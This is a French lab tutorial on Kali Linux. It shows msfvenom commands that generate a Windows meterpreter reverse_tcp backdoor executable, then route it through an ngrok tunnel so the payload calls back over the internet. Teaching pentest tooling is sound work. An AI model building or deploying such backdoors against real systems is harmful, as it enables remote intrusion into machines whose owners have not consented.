TP KALI LINUX

Télécharger au format pdf ou txt
Télécharger au format pdf ou txt
Vous êtes sur la page 1sur 14

TP KALI LINUX

CREATION DE PAYLOAD WINDOWS ET EXPLOITATION SUR LE WAN


INSTALLATION KALI LINUX
Url de téléchargement : https://www.kali.org/get-kali/#kali-platforms
Suivant la version de votre virtualiseur (VMWare, VirtualBox) vous pouvez télécharger la version
préinstallé de KALI LINUX
NB : nom d’utilisateur : kali
mot de passe : kali
Ou télécharger la version par défaut (image iso) avec les configurations de base et installations
manuellement
MISE A JOUR DES PACKAGES
Pour pleinement bénéficier du contenue et des outils offertes par l’OS KALI LINUX, une remise à
niveau des packages est préalablement nécessaire.

1 - Ouvrir un terminale en mode super utilisateur (Mot de passe : kali)


$ sudo su

2 – Mise a jour de l’index des packages avec la commande


#apt-get update
3 – Mise a jour de la version des packages déjà installés avec la commande
#apt-get upgrade
GENERATION D’UN BACKDOOR (VIRUS)
Msfvenom est un outil incluse dans Metasploit un framework très utilise dans les tests de pénétration.
Msfvenom est la fusion de msfpayload et msfencode, un outil de pentest permettant la génération de
payload (la charge utile servant de porte dérobée : Backdoor) et d’encodage d’évasion de Firewall

Syntaxe :
msfvenom –p {payload} LHOST = {Addresse IP Local} LPORT = {Port Local} –f {extension du fichier} –o
{Chemin du sortie} –e {Algorithme d’encodage}

1 – Déterminons l’adresse IP de la machine virtuelle KALI


#ifconfig
2 – Générons un payload pour le système d’exploitation Windows
#msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.0.149
LPORT=22 –f exe –o ./asr.exe

3 – Vérifions l’existence du fichier dans le répertoire courant


#ls -l
NGROK : Port Fowarding (Tunneling)
1 – Créer et procéder a la connexion d’un compte NGROK depuis l’url :
https://ngrok.com
2 – Rendez vous dans la partie Setup & Installation

3 – Choisissez la version linux de l’outil


4 – Appuyez sur le bouton Download pour télécharger la version Linux

3 – Choisissez la version linux de l’outil

5 – Extraire le contenue du téléchargement (ngrok-v3-stable-linux-amd64.tgz) dans /home/kali


6 – Ajouter la permission d’exécution sur le fichier NGROK
#chmod +x ngrok

7 – Dans Authtoken Copiez la première commande suivant la valeur de votre token (jeton) d’authentification
ngrok config add-authoke {Valeur token}
8 – Exécuter la commande si dessus copiée dans le répertoire de contenant ngork (/home/kali)

9 – Créez un tunnel sur le port 22 en TCP


#ngrok tcp 22
Les valeurs de la ligne Forwarding serviront d’adresse Public pour une exploitation du payload sur le
réseau WAN.
Dans cette perspective il est impérative de recréer un payload msfvenom avec les adresse IP et Port
du Tunnel NGROK qui redirigera le Traffic vers notre poste la machine virtuelle kali

#msfvenom –p windows/meterpreter/reverse_tcp LHOST=2.tcp.eu.ngrok.io LPORT=14686 –f exe –o


./asr_wan.exe

Vous aimerez peut-être aussi